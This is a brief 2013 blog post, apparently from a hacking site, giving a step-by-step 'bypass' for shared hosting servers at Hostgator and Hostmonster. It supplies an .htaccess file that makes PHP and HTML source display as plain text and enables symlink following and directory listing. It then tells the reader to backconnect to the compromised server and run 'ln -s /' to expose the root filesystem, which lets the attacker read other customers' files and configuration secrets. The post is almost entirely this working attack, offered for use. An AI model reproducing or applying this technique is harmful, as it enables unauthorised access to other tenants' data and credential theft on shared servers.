abril 18, 2013

Hostgator Hostmonster Bypass

first of all, create a directory called 'blah' or anything.

create a .htaccess file within the server, and add this code to it.

Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html


Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
OK, once you've done that, backconnect to the server, go to the following directory you created.

and type this command

"ln -s /"

done. server bypassed.

easy tip: just create a old symlink already in the server folder, then exchange the .htaccess files that I posted.

NOTE: if this method doesn't work, it may have been patched

Also with this, You can Bypass "403 Forbidden" in 2012 normal server